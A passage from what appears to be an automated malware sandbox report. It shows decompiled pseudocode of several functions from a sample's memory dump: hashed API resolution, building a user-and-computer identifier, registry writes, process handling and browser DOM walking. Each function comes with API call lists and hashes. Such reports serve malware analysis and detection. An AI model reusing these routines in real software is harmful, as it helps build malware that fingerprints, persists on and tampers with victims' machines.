                                                          0x047f59bd
                                                          0x047f59a7
                                                          0x047f5991
                                                          0x047f597b
                                                          0x047f5a10

                                                          APIs
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,047F8EBD,?,00000001,?,?,00000000,00000000), ref: 047F5952
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 047F5974
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 047F598A
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 047F59A0
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 047F59B6
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 047F59CC
                                                            • Part of subcall function 047F6604: memset.NTDLL ref: 047F6683
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                          • String ID:
                                                          • API String ID: 1886625739-0
                                                          • Opcode ID: cab42165c60c823e2f3ea60c306fc39c5741960e3e43ed47ea77bf93487f9622
                                                          • Instruction ID: 58dd443cfc7e15335f3ba2a59a0fa7cd5669232789eeb7070e5f1b8bced2bca3
                                                          • Opcode Fuzzy Hash: cab42165c60c823e2f3ea60c306fc39c5741960e3e43ed47ea77bf93487f9622
                                                          • Instruction Fuzzy Hash: 812141B560070AFFD720EFA9CC88D9AB7ECEF043547018526E646C7321E778E9058B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F853F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E047F853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x47fd33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E047F9070( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E047F6E98(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E047FA734(_a8);
						goto L29;
					}
					_t64 =  *0x47fd278; // 0x52e9a98
					_t16 = _t64 + 0xc; // 0x52e9b66
					_t65 = E047F9070(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d047fc0
						if(E047F22F1(_t97,  *_t33, _t91, _a8,  *0x47fd334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x47fd2a8; // 0xaea5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x47fea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x47fe8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E047F6C38(_t69,  *0x47fd334,  *0x47fd338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x47fd2a8; // 0xaea5a8
									_t44 = _t71 + 0x47fe846; // 0x74666f53
									_t73 = E047F9070(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d047fc0
										E047F5D7D( *_t47, _t91, _a8,  *0x47fd338, _a24);
										_t49 = _t101 + 0x10; // 0x3d047fc0
										E047F5D7D( *_t49, _t91, _t99,  *0x47fd330, _a16);
										E047FA734(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d047fc0
									E047F5D7D( *_t40, _t91, _a8,  *0x47fd338, _a24);
									_t43 = _t101 + 0x10; // 0x3d047fc0
									E047F5D7D( *_t43, _t91, _a8,  *0x47fd330, _a16);
								}
								if( *_t101 != 0) {
									E047FA734(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d047fc0
					_t81 = E047F8BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d047fc0
							E047F22F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E047FA734(_t100);
						_t98 = _a16;
					}
					E047FA734(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E047FA749(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x47fd33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                                          0x047f853f
                                                          0x047f8548
                                                          0x047f854f
                                                          0x047f8554
                                                          0x047f85c1
                                                          0x047f85c7
                                                          0x047f85cc
                                                          0x047f85d3
                                                          0x047f85d8
                                                          0x047f85dd
                                                          0x047f8748
                                                          0x047f874f
                                                          0x047f874f
                                                          0x047f8754
                                                          0x047f8756
                                                          0x047f8756
                                                          0x047f875f
                                                          0x047f875f
                                                          0x047f85e3
                                                          0x047f85ef
                                                          0x047f873e
                                                          0x047f8741
                                                          0x00000000
                                                          0x047f8741
                                                          0x047f85f5
                                                          0x047f85fa
                                                          0x047f85fd
                                                          0x047f8602
                                                          0x047f8607
                                                          0x047f8650
                                                          0x047f8650
                                                          0x047f8663
                                                          0x047f866d
                                                          0x047f8673
                                                          0x047f867a
                                                          0x047f8684
                                                          0x047f8684
                                                          0x047f867c
                                                          0x047f867c
                                                          0x047f867c
                                                          0x047f867c
                                                          0x047f86a6
                                                          0x047f86ae
                                                          0x047f86dc
                                                          0x047f86e1
                                                          0x047f86e8
                                                          0x047f86ed
                                                          0x047f86f1
                                                          0x047f8723
                                                          0x047f86f3
                                                          0x047f8700
                                                          0x047f8703
                                                          0x047f8713
                                                          0x047f8716
                                                          0x047f871c
                                                          0x047f871c
                                                          0x047f86b0
                                                          0x047f86bd
                                                          0x047f86c0
                                                          0x047f86d2
                                                          0x047f86d5
                                                          0x047f86d5
                                                          0x047f872d
                                                          0x047f8739
                                                          0x047f872f
                                                          0x047f8732
                                                          0x047f8732
                                                          0x047f872d
                                                          0x047f86a6
                                                          0x00000000
                                                          0x047f866d
                                                          0x047f8616
                                                          0x047f8619
                                                          0x047f8620
                                                          0x047f8626
                                                          0x047f8629
                                                          0x047f862b
                                                          0x047f8637
                                                          0x047f863a
                                                          0x047f863a
                                                          0x047f8640
                                                          0x047f8645
                                                          0x047f8645
                                                          0x047f864b
                                                          0x00000000
                                                          0x047f864b
                                                          0x047f8559
                                                          0x00000000
                                                          0x047f8580
                                                          0x047f8580
                                                          0x047f858c
                                                          0x047f859f
                                                          0x047f85a5
                                                          0x047f85ad
                                                          0x00000000
                                                          0x047f85ad

                                                          APIs
                                                          • StrChrA.SHLWAPI(047F3741,0000005F,00000000,00000000,00000104), ref: 047F8572
                                                          • lstrcpy.KERNEL32(?,?), ref: 047F859F
                                                            • Part of subcall function 047F9070: lstrlen.KERNEL32(?,00000000,052E9A98,00000000,047F8808,052E9C76,?,?,?,?,?,63699BC3,00000005,047FD00C), ref: 047F9077
                                                            • Part of subcall function 047F9070: mbstowcs.NTDLL ref: 047F90A0
                                                            • Part of subcall function 047F9070: memset.NTDLL ref: 047F90B2
                                                            • Part of subcall function 047F5D7D: lstrlenW.KERNEL32(?,?,?,047F8708,3D047FC0,80000002,047F3741,047FA513,74666F53,4D4C4B48,047FA513,?,3D047FC0,80000002,047F3741,?), ref: 047F5DA2
                                                            • Part of subcall function 047FA734: HeapFree.KERNEL32(00000000,00000000,047F5637,00000000,?,?,00000000), ref: 047FA740
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 047F85C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: ($\
                                                          • API String ID: 3924217599-1512714803
                                                          • Opcode ID: 0cd4290f1b381adfd842cd6677e1e2e898f901c7453d0b8c75c2184f4254b426
                                                          • Instruction ID: a83ee791af4d8ad868444cc8a7de20eff27eeb92da6c8e5e020fe80d5df9a3f7
                                                          • Opcode Fuzzy Hash: 0cd4290f1b381adfd842cd6677e1e2e898f901c7453d0b8c75c2184f4254b426
                                                          • Instruction Fuzzy Hash: 8651297610060AEFEF21AFA1DD44EAA77B9FF04354F018514FB1596320E73AE915EB22
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047FA199, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E047FA199() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E047FA71F(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E047FA734(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x47f1fd4
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                                          0x047fa1a7
                                                          0x047fa1aa
                                                          0x047fa1ad
                                                          0x047fa1b3
                                                          0x047fa1b8
                                                          0x047fa1be
                                                          0x047fa1c6
                                                          0x047fa1c9
                                                          0x047fa1cf
                                                          0x047fa1d4
                                                          0x047fa1e1
                                                          0x047fa1ee
                                                          0x047fa1f2
                                                          0x047fa1f4
                                                          0x047fa1f8
                                                          0x047fa1fb
                                                          0x047fa20b
                                                          0x047fa25e
                                                          0x047fa25f
                                                          0x047fa20d
                                                          0x047fa212
                                                          0x047fa213
                                                          0x047fa218
                                                          0x047fa21b
                                                          0x047fa22e
                                                          0x00000000
                                                          0x047fa230
                                                          0x047fa233
                                                          0x047fa238
                                                          0x047fa246
                                                          0x047fa249
                                                          0x047fa24f
                                                          0x047fa254
                                                          0x00000000
                                                          0x047fa256
                                                          0x047fa256
                                                          0x047fa259
                                                          0x047fa259
                                                          0x047fa254
                                                          0x047fa22e
                                                          0x047fa264
                                                          0x047fa265
                                                          0x047fa1d4
                                                          0x047fa26b

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,047F1FD2), ref: 047FA1AD
                                                          • GetComputerNameW.KERNEL32(00000000,047F1FD2), ref: 047FA1C9
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • GetUserNameW.ADVAPI32(00000000,047F1FD2), ref: 047FA203
                                                          • GetComputerNameW.KERNEL32(047F1FD2,?), ref: 047FA226
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,047F1FD2,00000000,047F1FD4,00000000,00000000,?,?,047F1FD2), ref: 047FA249
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: 3c90d92f5826c5b07947633206aa85efa32afa4b8fe06bc3f448833c604aa7f5
                                                          • Instruction ID: c6b1a635010ae997e1a9aaf359efc6a1b7930c24fef2c636b43b9b2a9db3da65
                                                          • Opcode Fuzzy Hash: 3c90d92f5826c5b07947633206aa85efa32afa4b8fe06bc3f448833c604aa7f5
                                                          • Instruction Fuzzy Hash: 1221C976A01208EFDB11DFE9DA849EEBBB8FA44304B1044AAE605E7340D635AB45DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F3DE9, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E047F3DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E047F5AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E047FA81C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x47fd128() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                                          0x047f3de9
                                                          0x047f3df6
                                                          0x047f3df8
                                                          0x047f3e5b
                                                          0x00000000
                                                          0x047f3e5b
                                                          0x047f3e10
                                                          0x047f3e17
                                                          0x047f3e23
                                                          0x047f3e28
                                                          0x047f3e2a
                                                          0x047f3e2c
                                                          0x047f3e2e
                                                          0x047f3e30
                                                          0x047f3e32
                                                          0x047f3e3e
                                                          0x047f3e4e
                                                          0x00000000
                                                          0x047f3e40
                                                          0x047f3e40
                                                          0x047f3e47
                                                          0x047f3e54
                                                          0x047f3e54
                                                          0x047f3e54
                                                          0x047f3e47
                                                          0x047f3e3e
                                                          0x047f3e59
                                                          0x00000000
                                                          0x00000000
                                                          0x047f3e5f

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,047F67B8,?,?,00000000,00000000), ref: 047F3E23
                                                          • ResetEvent.KERNEL32(?), ref: 047F3E28
                                                          • GetLastError.KERNEL32 ref: 047F3E40
                                                          • GetLastError.KERNEL32(?,?,00000102,047F67B8,?,?,00000000,00000000), ref: 047F3E5B
                                                            • Part of subcall function 047F5AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,047F3E08,?,?,?,?,00000102,047F67B8,?,?,00000000), ref: 047F5AFD
                                                            • Part of subcall function 047F5AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,047F3E08,?,?,?,?,00000102,047F67B8,?), ref: 047F5B5B
                                                            • Part of subcall function 047F5AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 047F5B6B
                                                          • SetEvent.KERNEL32(?), ref: 047F3E4E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: 561888a447012ee487e946a1a5d3c03d86ad6f77a148cdfbda549cb7d68d2d97
                                                          • Instruction ID: c827f5df9bc7f778c9c6935e982b14c9192adfd877bb9b4a4b29e3a706033250
                                                          • Opcode Fuzzy Hash: 561888a447012ee487e946a1a5d3c03d86ad6f77a148cdfbda549cb7d68d2d97
                                                          • Instruction Fuzzy Hash: 4E014B31104201ABEB316B71DC48F5BBBA8FF48B64F114A26FA51D13E0D761E8159B65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F3E69, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E047F3E69(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x47fd26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x47fd25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x47fd258 = _t6;
					 *0x47fd264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x47fd254 = _t7;
					if(_t7 == 0) {
						 *0x47fd254 =  *0x47fd254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                                          0x047f3e71
                                                          0x047f3e77
                                                          0x047f3e7e
                                                          0x00000000
                                                          0x047f3ed8
                                                          0x047f3e80
                                                          0x047f3e88
                                                          0x047f3e95
                                                          0x047f3e95
                                                          0x047f3ed5
                                                          0x00000000
                                                          0x047f3ed5
                                                          0x047f3e97
                                                          0x047f3e97
                                                          0x047f3e9c
                                                          0x047f3eae
                                                          0x047f3eb3
                                                          0x047f3eb9
                                                          0x047f3ebf
                                                          0x047f3ec6
                                                          0x047f3ec8
                                                          0x047f3ec8
                                                          0x00000000
                                                          0x047f3ecf
                                                          0x047f3e91
                                                          0x00000000
                                                          0x00000000
                                                          0x047f3e93
                                                          0x00000000

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,047F131F,?,?,00000001,?,?,?,047F4EF2,?), ref: 047F3E71
                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,047F4EF2,?), ref: 047F3E80
                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,047F4EF2,?), ref: 047F3E9C
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,047F4EF2,?), ref: 047F3EB9
                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,047F4EF2,?), ref: 047F3ED8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: 3ba371c77714e289da1ac0edc8746360fbb044475e47d9d8835095b35988756d
                                                          • Instruction ID: 103045106ab8d71f88d40b1369ab5e64c51cb91d441e5e915aa88e86a2fbd91e
                                                          • Opcode Fuzzy Hash: 3ba371c77714e289da1ac0edc8746360fbb044475e47d9d8835095b35988756d
                                                          • Instruction Fuzzy Hash: 28F04470645305AFE7318FB99E19B997B51FB84741F108915EE43CA3C0D778D842CB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F6F3A, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 46%
                                                          			E047F6F3A(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x47fd2a8; // 0xaea5a8
					_t5 = _t103 + 0x47fe038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x47fc290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x47fd2a8; // 0xaea5a8
												_t28 = _t109 + 0x47fe0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x47fd2a8; // 0xaea5a8
														_t33 = _t79 + 0x47fe078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                                          0x047f6f3f
                                                          0x047f6f48
                                                          0x047f6f49
                                                          0x047f6f4d
                                                          0x047f6f53
                                                          0x047f6f59
                                                          0x047f6f62
                                                          0x047f6f68
                                                          0x047f6f72
                                                          0x047f6f74
                                                          0x047f6f7a
                                                          0x047f6f7f
                                                          0x047f6f8a
                                                          0x047f6f90
                                                          0x047f6f95
                                                          0x047f70b7
                                                          0x047f6f9b
                                                          0x047f6f9b
                                                          0x047f6fa8
                                                          0x047f6fae
                                                          0x047f6fb4
                                                          0x047f6fb8
                                                          0x047f6fbe
                                                          0x047f6fcb
                                                          0x047f6fcf
                                                          0x047f6fd5
                                                          0x047f6fd8
                                                          0x047f6fe0
                                                          0x047f6fe1
                                                          0x047f6fe5
                                                          0x047f6fe9
                                                          0x047f6fec
                                                          0x047f6fef
                                                          0x047f6ff5
                                                          0x047f6ffe
                                                          0x047f7004
                                                          0x047f7005
                                                          0x047f7008
                                                          0x047f7009
                                                          0x047f700a
                                                          0x047f7012
                                                          0x047f7013
                                                          0x047f7014
                                                          0x047f7016
                                                          0x047f701a
                                                          0x047f701e
                                                          0x00000000
                                                          0x00000000
                                                          0x047f7024
                                                          0x047f702d
                                                          0x047f7033
                                                          0x047f703d
                                                          0x047f7041
                                                          0x047f7043
                                                          0x047f7050
                                                          0x047f7054
                                                          0x047f705c
                                                          0x047f7061
                                                          0x047f7073
                                                          0x047f7075
                                                          0x047f707b
                                                          0x047f707b
                                                          0x047f7084
                                                          0x047f7084
                                                          0x047f7086
                                                          0x047f708c
                                                          0x047f708c
                                                          0x047f708f
                                                          0x047f7095
                                                          0x047f7098
                                                          0x047f70a1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x047f70a1
                                                          0x047f6ff5
                                                          0x047f6fef
                                                          0x047f6fd8
                                                          0x047f70a7
                                                          0x047f70a7
                                                          0x047f70ad
                                                          0x047f70ad
                                                          0x047f70b3
                                                          0x047f70b3
                                                          0x047f70bc
                                                          0x047f70c2
                                                          0x047f70c2
                                                          0x047f6f7f
                                                          0x047f70cb

                                                          APIs
                                                          • SysAllocString.OLEAUT32(047FC290), ref: 047F6F8A
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 047F706B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F7084
                                                          • SysFreeString.OLEAUT32(?), ref: 047F70B3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: cab95383808e53f86bdc8b437c0945fed9042c897f3cf2be0e12f9f8309b81ab
                                                          • Instruction ID: 69585ec8cd0733fd6f3319ec0b88ed5070a7b093d2892500d4c8d825223c3d07
                                                          • Opcode Fuzzy Hash: cab95383808e53f86bdc8b437c0945fed9042c897f3cf2be0e12f9f8309b81ab
                                                          • Instruction Fuzzy Hash: 4E511C75900519EFCB15DFE8C888DAEB7B9FF89704B148998E915EB310D732AD41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F53C6, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 85%
                                                          			E047F53C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E047F1AD1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
